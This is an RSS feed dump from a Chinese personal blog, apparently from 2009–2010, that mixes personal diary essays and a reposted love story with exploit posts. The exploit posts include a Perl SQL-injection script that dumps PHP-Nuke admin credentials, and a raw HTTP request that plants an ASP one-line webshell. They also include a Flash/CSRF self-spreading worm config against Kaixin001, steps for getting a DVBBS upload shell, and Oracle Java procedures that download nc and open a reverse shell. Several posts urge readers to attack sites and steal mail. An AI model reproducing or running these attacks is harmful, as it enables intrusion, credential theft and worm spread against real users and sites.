<![CDATA[惘然's Blog]]> http://www.wangran.net/ zh-cn PBlog2 v2.4 惘然's Blog http://www.wangran.net/images/logos.gif http://www.wangran.net/ 惘然's Blog http://www.wangran.net/article/exploit/93.htm <![CDATA[PHP-Nuke <= 8.1.0.3.5b Remote SQL Injection]]> wangran@263.net(惘然) Wed,28 Jul 2010 13:39:17 +0800 http://www.wangran.net/default.asp?id=93
程序代码 程序代码

#!/usr/bin/perl
use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;

my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my ($Victime) = shift or &usage;
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Search');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
                        agent => 'Mozilla/5.0',
                        max_redirect => 0,
                        cookie_jar => $Cookies,
                        default_headers => HTTP::Headers->new,
                ) or die $!;
my $Response;
my $Referrer = "query=Dante90, WaRWolFz Crew&topic=&category=0&author=Dante90, WaRWolFz Crew&days=0&type=stories";

sub SQL_Injection {
        my ($Victime) = @_;
        return "Dante90' UNION--\n Select 1,2,3,CONCAT_WS(CHAR(32,58,32),`aid`,`name`,`email`,`pwd`),5,6,7,8,9,10 FROM `nuke_authors` Where `aid`='${Victime}'-- ";
}

$Method->referer($HostName.'modules.php?name=Search');
$Method->content_type('application/x-www-form-urlencoded');
$Method->content("query=Dante90, WaRWolFz Crew&topic=&category=0&author=".SQL_Injection($Victime)."&days=0&type=stories");
$Response = $UserAgent->request($Method);
$Response->is_success or die "$HostName : ",$Response->message,"\n";

if ($Response->content =~ /([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9.@]{1,50}) : ([a-f0-9]{32})/i) {
        refresh($HostName, $1, $2, $3, $4);
        print " * Exploit Successfully Executed                        *\n";
        print " -------------------------------------------------------- \n\n";
        system("pause");
} else {
        refresh($HostName, "", "", "", "");
        print " * Error extracting sensible data.\n";
        print " * Exploit Failed                                       *\n";
        print " -------------------------------------------------------- \n\n";
}

sub usage {
        system("cls");
        {
                print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Search 'author') Remote SQL Injection Exploit\n";
                print " -------------------------------------------------------- \n";
                print " * USAGE:                                               *\n";
                print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";
                print " * perl name_exploit.pl [victime]                       *\n";
                print " -------------------------------------------------------- \n";
                print " *          Powered By Dante90, WaRWolFz Crew           *\n";
                print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *\n";
                print " -------------------------------------------------------- \n";
        };
        exit;
}

sub refresh {
        system("cls");
        {
                print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Search 'author') Remote SQL Injection Exploit\n";
                print " -------------------------------------------------------- \n";
                print " * USAGE:                                               *\n";
                print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";
                print " * perl name_exploit.pl [victime]                       *\n";
                print " -------------------------------------------------------- \n";
                print " *          Powered By Dante90, WaRWolFz Crew           *\n";
                print " *  www.warwolfz.org - dante90_founder[at]warwolfz.org  *\n";
                print " -------------------------------------------------------- \n";
        };
        print " * Victime Site: " . $_[0] . "\n";
        print " * User ID: " . $_[1] . "\n";
        print " * Username: " . $_[2] . "\n";
        print " * Password: " . $_[4] . "\n";
        print " * E-Mail: " . $_[3] . "\n";
}
]]> http://www.wangran.net/article/exploit/92.htm <![CDATA[mail.163漏洞]]> wangran@263.net(惘然) Sun,04 Jul 2010 03:49:41 +0800 http://www.wangran.net/default.asp?id=92 自己本地放个upload.js的修改版 用firebugs修改引入
伟哥提供的漏洞
本地验证  很容易搞的  不成功的就是人品有问题了

http://zhidao.mail.163.com/zhidao/js/upload.js


来源:马骏's blog

转载写明出处
]]> http://www.wangran.net/article/Diary/91.htm <![CDATA[残片..碎语]]> wangran@263.net(惘然) Wed,17 Mar 2010 15:02:08 +0800 http://www.wangran.net/default.asp?id=91 对我来说,只有心情彻底不好的时候我才会去乱写写!
当然..乱写也只是给自己看!

文字很随意,因为它并不能代表什么..我只是喜欢这样安静的写…随心所欲的发泄…
有些苍白..有些散乱!!我不知道别人能不能读懂..
喜欢的继续喜欢,讨厌的继续讨厌吧。
与我无关。

在家里赖了一个上午的床,起来的时候才发现外面阳光很灿烂!不知道是不是冬天过去了,虽然气候很暖和,可是我还是没有温暖..不是因为什么,而是我感觉不到….
酒其实个好东西, 喝醉过后,可以让人忘掉一切..开心的和不开心的..只是当再次醒来的时候,一切又不得不再继续。
朋友们都在忙着自己的事,只有我天天挂在网上抱怨着无聊…有点惭愧,不是我不想干点正事..而是我找不到方向..经常沉醉于自己的幻想当中,把神经都浸泡在回忆里,不想理会周围的任何人或事..
思维一度陷入混乱..就是因为混乱,所以我不知所措,茫然,没有方向感.,我想,总有一天我会在这样的环境下精神分裂..
居然可以以一天到晚,只听一首歌,反复的播放!从坐到电脑面前开始.直到睡觉...最近更加变本加厉,可以20多个小时只开着一个网页在电脑面前发呆.. 想想都让人觉得害怕.
又想起以前的事情了,生活不需要那么多的回忆..没有什么大不了…
记忆是一件太苦的事情,所以我要放手了。
嗯,再见..就像这样!


关闭了在网上的一个博客,上面写着的一些伤感的,颓废的文字。我都选择删掉,其实忘记,有时是一种不得已而为之的苦衷..
摊开敲击键盘的手掌.不知道它还能不能继续抓住我想要的某些东西,只是我要去的世界可能永远也到不了,我还是一个无法幸福的人..
爱情,我一直闭口不谈.只想做个快乐的人,我是个简单的人,我想要的也是一个简单的生活,看见她的时候,已经没有了初次的那种感觉,但是又不是什么感觉都没有,想要她幸福,想要她快乐,也许就是此刻我的心情吧!不过,只是是两条平行的线而已,所以于我也没有太大的干系。我果然还是个只爱自己的人,任着自己的性子而为,只要自己开心就好。。
常常为自己不得不面对现实而感到无奈,也为自己不得不八面玲珑感到恶心,后来发现,自己其实一直在任性的做着自己想做的事。这很好。安妮宝贝说过,有些事情,我们一直无能为力。
写到这里,文字开始匮乏。不知道还能写点什么,音乐和我,我与文字。也许都回到了简单的从前。今年眼看着要过去,很多事情开始断断续续的做个了结。看过的小说,流过的眼泪,爱过的人群。



在开始的时候开始结束,在结束的时候再重新开始,这就是我的生活。



                                                                                                                                                       By 惘然 2010-1.31 中午
]]> http://www.wangran.net/article/Diary/90.htm <![CDATA[冬夜·感伤]]> wangran@263.net(惘然) Wed,16 Dec 2009 12:41:21 +0800 http://www.wangran.net/default.asp?id=90


时间不经意的从指间滑落,是怨指缝太宽还是恨时间太不留情。仿佛梦一场.转眼间又到年末了,眼看人生就要走到了第24个年头,心情很复杂,有欢喜,也有失落。



独自坐在电脑桌前,听着窗外呼啸的北风,看着那一片片凋零的树叶,望着冰冰冷冷的显示器.思维一下又陷于混乱。努力甩了下头,使劲把身体往后靠,仰靠在椅子上,入眼,一片雪白的天花板,习惯的点上一支烟,闭上眼..贪婪的吸着尼古丁的味道,想象的伸出一支手,舞荡在半空中,触手过处,一片冰冰冷冷的空气中,夹杂着的全是寂寞。我也不想这样,可总是抵挡不住那壁藤般的蔓延。



天天都要到半夜才能睡去,不知道干什么.也没干什么..QQ里来来往往的依旧是那几个熟悉的朋友。一大半的时间都是对着电脑发呆,对于我来说.似乎电脑和网络成了我生活中的主旋律。窗外的路灯依旧明亮,冷冷清清的街道,连行人都很稀少,旁边喧闹的KTV依旧灯红酒绿,不时从里面传出来那五音不全的咆哮声依旧那么刺耳,不过我现在倒觉得也许有时候这是最好的宣泄。有人说,思恋使痛苦的,但有谁知道,最痛苦的是没有什么可以去思恋,而我正是如此。



有些人儿,有些事是无法碰触的,如果有一天,他们在风中消逝了,那也许是没有这个世界的又一次轮回。曾经在这里或在那里停留过的人儿,在不经意间的回头,瞬间凝固。就算失去在时间的长河中。

闭上眼睛,放上一首自己喜欢听的钢琴曲。听着柔和的音乐,良久过后,才发现眼角早已湿润。

这是个什么样的夜晚?是迷茫,是欢喜,怎么又成了回忆,最后安静了。我想那也是哭泣,无言的哭泣。还有什么比这更痛苦的呢?原来在这个寂寞流行的季节,那些蓬松的记忆,早已随着音乐渐渐飘散,好远,好远。



一个不眠的夜晚,在阵阵感伤中结束。在明天太阳升起之前,让我用这苍白的文字记录吧。





                                   By 惘然 2009-12-15 夜
]]> http://www.wangran.net/article/exploit/89.htm <![CDATA[花马收信箱子getshell 0day]]> wangran@263.net(惘然) Thu,29 Oct 2009 09:59:34 +0800 http://www.wangran.net/default.asp?id=89 整套程序过滤什么的灰常的严密,看得出来是专业的安全人士写的,唯一可以利用的地方就在这个wsidny.asp
看代码:
程序代码 程序代码
<!-- #include file="conn.asp"-->
<%
    Server.ScriptTimeout = 36000
   PostSize = Request.TotalBytes
if postsize=0 then
response.End()
end if
    BytesRead = 0        
     ReadSize=256
     HeadSize=256
     filename = Request.BinaryRead(ReadSize)
     BytesRead = BytesRead + ReadSize        
    PostData = Request.BinaryRead(PostSize - BytesRead)
    StoreFile(filename)
Function Bytes2bStr(vin)
if lenb(vin) =0 then
        Bytes2bStr = ""
        exit function
end if
Dim BytesStream,StringReturn
set BytesStream = Server.CreateObject("ADODB.Stream")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = "gb2312"
BytesStream.Position = 2
StringReturn = BytesStream.ReadText
BytesStream.close
set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
Function StoreFile(filename)
filea=Bytes2bStr(filename)
filea=LCase(filea)

if instr(filea,".")>0 then
fileb=split(filea,".")
num2=ubound(fileb)
if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
filea=filea
else
filea=filea&".gif"
end if
else
filea=filea&".gif"
end if

Path=server.MapPath(imgFolder&filea)
Set oFileStream = CreateObject ("ADODB.Stream")
  oFileStream.Type = 1
  oFileStream.Mode = 3
  oFileStream.Open
    oFileStream.Write(PostData)
  oFileStream.SaveToFile Path,2
  oFileStream.Close
  Set oFileStream = Nothing
End Function
    Response.Write PostSize
    Response.Write " bytes were read."        
%>


没搞懂这个页面是用来干什么的,可能是生成图片破密保的吧。一开始是想本地构造表单直接提交,上传带;的图片马,结果因为是Request.BinaryRead取的数据,所以urlencode过的参数都取不出来。改用vbs发包。这里又有个问题,因为路径是取的前256个字符,超过了后面server.MapPath所支持的最大长度,于是想到了用\00截断,把vbs发送的http请求抓出来,用ue写截断,然后提交,去掉包含文件测试成功。但是带包含的时候还报错。因为前面的conn.asp包含了一个fsql.asp防注页面,检查了request.form,调用了request.form之后就不能再调用Request.BinaryRead了否则会报错。那这个页面的意义何在?
在这里纠结了好久,试着去掉http头里的Content-Type: application/x-www-form-urlencoded,提交,发现竟然上传成功鸟,这才发现自己以前一直SB了。去掉这一个头,iis就会认为没有用表单格式提交的参数,这样用request.form就不会收到任何数据,也就不会跟后面的Request.BinaryRead冲突了
下面发利用方法:

程序代码 程序代码
POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive

a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>

一句话代码前面要构造到256个字符,然后在ue里面把空格用\00代替,改下主机头啥的,NC提交,看到返回xxx bytes were read.的话,就成功了,目标文件夹下img/a.asp就是了,如果图片目录找不到或者不可执行啥的,可以用../什么的跳出来就好了,只要保证一句话前面刚好有256个字符就是了
本地测试成功,大家遇到箱子信封什么的,就使劲的日吧!

某大牛用马甲发在T00ls的..非常强大!!桐子们 赶快偷信去...
]]> http://www.wangran.net/article/wangran/88.htm <![CDATA[一个小故事,看完很感动<转>]]> wangran@263.net(惘然) Mon,12 Oct 2009 21:46:13 +0800 http://www.wangran.net/default.asp?id=88 有人掀了珠帘进来,伞礼貌地收在门外。
很好看的女孩子,干净的面容,干净的眼神,干净的打扮。
说了声你好,便不再打搅她,让她自由地在店里挑选。
她仔细地将中意的小物品一一拿起,看片刻,小心地抚摩,又放下。我留意到,她总是先看价钱。
想必,经济不太好吧。
她最后选中了一款好看的时装表,一个精巧的小背包。有点出乎我的意料,那两件东西,价格都不算便宜。
要这两件吗?我不动声色。
有折扣吗?她小声问,有些羞涩,脸色浅红。
天气差,顾客少,难得你来,八折吧。做了两年的店主,这样的事,我轻松应对得来。
她犹豫了一下,但还是点了点头,没有再继续讨价还价,把东西递给我。
我习惯地拿过来包装,却被她阻止,她说,我先给你一些钱,你把它们放回原处,晚一会儿我再过来拿好吗?
我有些疑惑,但还是飞快应允,也有顾客会把东西预订下,交一点点订金。可我没想到,她交的订金,竟是全部价款的一多半。剩下的钱,不超过一百元。真是奇怪的女孩,既是这样,干吗不带走?
虽有疑惑,我并不多问,这是顾客的自由。既然她付了这么多钱,按惯例,自然要给她包好放起来,然后等她来取。
她却依旧阻止我,依旧小声说,先把它们放回原处好吗?眼神里,有几分请求。
我笑笑,点点头,仔细地把包包和手表重新放回原处。
谢谢你,我很快就过来。她的眼神欢快起来,到门边取了伞,很快消失在我的视野之外。
这个奇怪的女孩!
不久她又来了,但不是一个人,她的身后,跟了一个个子高高的男孩,气质和她真是登对。都是干干净净的面容,干干净净的眼神,穿棉质卡其色外套。
我刚要把她预付过大半货款的包包和手表取给她,她却似乎没看见我一样,转头拉着男孩的手说,我喜欢那个包包,看,就是那个红色的,好多兜兜的那个。说着,已经在我之前,把男孩拉到了那个包包前。
你喜欢就买。男孩伸手把包包取下来,边递给她边说,就是挺好看的。
她点着头,把包包抱在怀里,眼睛继续四下搜寻。
我沉住气不吭声,看她到底要做什么。
她装得跟真的一样,摸摸这个,看看那个。两分钟后,才"惊喜"地又看到了那只时装表。拿过来,转头,拉着男孩的胳膊撒娇,你说本命年的生日送我两件礼物的。
男孩的脸微微红了,小声说,当然,只要你喜欢。
她几乎雀跃着,拿着她早就选中的两件物品走到我跟前,问我,老板,多少钱?说着,背对男孩冲我眨眨眼睛。
我忽然明白过来,心头一暖,脱口说,你可真会挑,这两件,都是今天的特价品,然后我报出一个价钱来。
她回头看男孩。
男孩的脸更红了,轻轻推她,这么便宜,太便宜了,买别的吧,我有钱。
我就要它们。她把东西抱在怀里,我喜欢。声音任性起来,快付钱啊。
男孩显然习惯了顺从她的脾气。不再说话,慌忙从裤兜里掏出钱来,大概四五百块的样子,想必,是他准备好了给她买礼物的钱。
我笑笑,抽过一百元,找零时,顺手从身后拿过一对卡通情侣杯,说,所有过生日的顾客,如果在我们这里买了礼物,都有礼品赠送的。我把杯子塞到她怀里说,生日快乐。
因为高兴,她的脸顷刻涨红了,连声说着谢谢,男孩也跟着说,诚恳的口吻。
然后他们走了,她怀里抱着礼物,被他安全地拥在臂弯里。雨并不算小,他们共同撑了一把伞,但我知道,他们谁都不会淋湿,因为他们都把对方爱得那么好。
他爱她,那种宠爱溢于言表。她爱他,给他足够的自尊,且不让他知道。可以确定他们是一对贫穷的恋人,可物质的比重却在他们这样的情爱里,单薄得失去了任何分量。

爱吗?爱多少?也不过这么多,不过是深爱着,且不让他知道]]> http://www.wangran.net/article/Safe/87.htm <![CDATA[利用Fly_Flash蠕虫攻击开心网]]> wangran@263.net(惘然) Fri,09 Oct 2009 23:56:15 +0800 http://www.wangran.net/default.asp?id=87
漏洞分析:Flash在越来越多的网站得到广泛的应用,往往被用来播放视频,游戏或者是其他复杂的用户交互功能,但是在使用Flash的时候,大部分的网站处理的时候并没有想象中那么安全,譬如在开心网的发日记的地方使用Flash的方式如下:
程序代码 程序代码
<embed allowscriptaccess="never" height=384 width=454 src=http://www.80sec.com/x.swf wmode="transparent" loop="false" autostart="false">

开心网直接允许在页面引入其他域的Flash,同时为了安全性,在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用语法分析的方式来做过滤,无法被绕过,但是这里漏掉了一个重要的属性allowNetworking,利用这个属性flash可以通过浏览器做网络访问。

同时开心网另外一个严重的问题就是CSRF问题,尽管其在重要的数据更改的地方都限制只能使用POST方式提交,但是所有的请求数据内容可以被预知,很容易就实现CSRF攻击。而开心网用户之间的交互非常之多,利用一些简单的功能就可以实现将某些内容引诱其他用户访问,CSRF的固有的攻击的被动性可以得到有效的弥补。
综合上面几点,我们就可以利用其中的漏洞主动的攻击开心网在线用户了。

技术实现:80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash,具体地址为http://www.80sec.com/fly_flash-0-1-release.html,利用Fly_Flash我们可以很方便的实现一次渗透测试,譬如在配置文件里写上
程序代码 程序代码
3,http://www.80sec.com/action.php?80sec,,,user=data&pass=data


既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求,请求的内容为后面的user=data&pass=data部分,并且整个请求不会受到浏览器的隐私策略的限制,可以同时使用持久Cookie和Session Cookie。

1 发布一个含有测试Flash的帖子,内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码
程序代码 程序代码
<embed allowscriptaccess="never" height=384 width=454 src=http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&x.swf wmode="transparent" loop="false" autostart="false">


2 http://www.80sec.com/fly_flash.txt内容是我们要构造的数据包请求,这里利用开心网的转贴功能实现内容在用户之间的传播
程序代码 程序代码
2,http://img.users.51.la/3182000.asp
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20569243&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20570931&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20567962&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/friend/addverify.php?80sec,,,from=&touid=773000&content=hi+%0D%0A%3A%29&rcode=&code=&usercode=&email=&bidirection=


其中2,http://img.users.51.la/3182000.asp用作访问的统计,后面的就是自己构造的对http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php发起的POST请求,后面的数据就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴,一旦其他好友查看之后就会再次自动转贴,蠕虫实现了借助转贴功能的传播。

3 恩,结束,就这么简单。

来源:80SEC
]]> http://www.wangran.net/article/exploit/86.htm <![CDATA[关于DVBBS那个8.2版本的漏洞]]> wangran@263.net(惘然) Wed,30 Sep 2009 09:22:50 +0800 http://www.wangran.net/default.asp?id=86 这个漏洞至少存在半年多了吧,我拿到手也有段时间了,没拿去搞多什么站,测试过几个用DVBBS的大站还是被我拿了SHELL,我一直放硬盘里都快烂了。
oldjun 大牛激动的跟我说,终于被发出来了,都半年多了..
严格的来说,这不算是DVBBS本身的漏洞。说到底算个BUG,但是配合IIS6的解析漏洞使用,就足已致命了。

利用方法如下:
注册用户-我的主页-个人空间管理
userspace.asp?sid=0&act=modifyset
然后编辑CSS风格-文件管理
Dv_plus/myspace/script/filemange.asp
上传 *.asp;*jpg

注意细节,先保存空间设置,然后随意修改CSS,再保存。页面出现乱码后,会有文件管理,点文件管理直接上传一个IIS6的解析漏洞的小马,格式123.asp;123.jpg 这样,直接访问地址就可以得到一个SHELL。

]]> http://www.wangran.net/article/Safe/85.htm <![CDATA[Linux下Oracle获取shell]]> wangran@263.net(惘然) Wed,23 Sep 2009 08:35:39 +0800 http://www.wangran.net/default.asp?id=85
而 对于Linux下的Oracle数据库入侵,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候,可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上,以下用简单 的方式获取Oracle的shell,即采用nc反弹的shell的方式。

1、Oracle数据库支持JAVA(如Windows下入侵一般)

2、通过Oracle客户端sqlplus,以sysdba用户登录(dbsnmp用户可提权至sysdba)

3、执行以下代码:

CODE_1:
程序代码 程序代码

create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
/*
* Command execution module
*/
public static void execCommand(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}

/*
* File reading module
*/
public static void readFile(String filename) throws IOException
{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}

/*
* File writing module
*/
public static void writeFile(String filename, String line) throws IOException
{
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}

_______________________________________________________
CODE_2:
程序代码 程序代码

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';

_______________________________________________________
CODE_3:
程序代码 程序代码

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';

_______________________________________________________

CODE_4:
程序代码 程序代码

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';


4、

exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc');  //写入wget nc 命令到文件getnc

exec dbms_java.set_output(2000);   //设置javareadfile

set serveroutput on;

exec javareadfile('/tmp/getnc');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/getnc'); //执行命令下载nc

exec javareadfile('/tmp/nc');   //查看nc是否下载成功

exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //写入反弹命令

exec javareadfile('/tmp/shell');  //读取文件查看是否写入成功

exec javacmd('/bin/sh /tmp/shell'); //执行nc反弹shell,在本地nc监听就能得到shell,如果不行,请确认防火墙


作者:浅凝]]> http://www.wangran.net/article/wangran/84.htm <![CDATA[随笔..]]> wangran@263.net(惘然) Tue,22 Sep 2009 00:22:07 +0800 http://www.wangran.net/default.asp?id=84                                                    ——题记                  
过去的日子又在轮回,一些记忆里的画面,一副副闪过脑海,不知不觉又迷失于其中...
一杯浓浓的茶,一个人发呆似的坐在电脑面前..面对一行行冰冷却又熟悉的代码,猛然间觉得陌生了起来..

尝试逃开一些人,忘记一些事,一段尘封太久的曾经.
可是经常在午夜梦回之时,被回忆那张无边无际的大网所包围,那种心疼到极处的感觉,压迫的我快要窒息.
为什么,我经常梦见你..带我去了一个陌生的地方,然后我面前出现一面玻璃,我能清晰的看得见你的身影,你一如既往的微笑,可是我始终都无法抓住你的手,感觉不到你手心带给我的温暖,你说"我们都是迷途的孩子,偶然间的一次相聚,之后每个人都要去寻找自己回家的路."也许是的,一切有开始,便会有终结,生活如此,命运也如此,我们要走的路也如此"

常常跟回忆较劲,跟自己较劲,我说我可以忘了你,可是老天给了我三年多的时间,我把自己封闭在一个陌生世界,不理会任何人,不关心任何事.我以为就这样可以慢慢的不去想起以前的那段时光,可是为什么每次深夜一个人对着电脑的时候,你的微笑就会继续浮现在我脑海里,于是我开始忧虑,开始焦躁,开始不安份,然后变得易怒,不可理喻,到最后,我又变得沉默,一个人对着冰冷的显示器发呆,那种没有任何思维的发呆,那种接近于死亡的发呆...脑海里的幻觉直接把我击成粉碎...

你说我还有未来吗?
行走,我逃开这个地方,流浪,经常迷失于陌生城市的繁华夜空,经常大醉于高楼大厦的天台,冷着眼睛看这个光怪陆离的世界,那么的美丽,可是偏偏又如此残缺!!
遇见过不同的人,看到过不同的事,我很想让我苍白的生活有那么一点颜色,其实我知道自己的浅薄,但是不知悔改...

渐行渐远,如此而已,即使知道万劫不复,却还义无反顾..原来深陷其中,并不需要透彻的懂得,只要坚持的继续...

请原谅我的懒惰,原谅我的不善言辞,原谅我的无常,亲爱的,原来我 一直就不曾知道什么是爱,却一直不停的给..

也许又一天我会就此老去,可是不会后悔,为什么??只是遗憾.....
]]>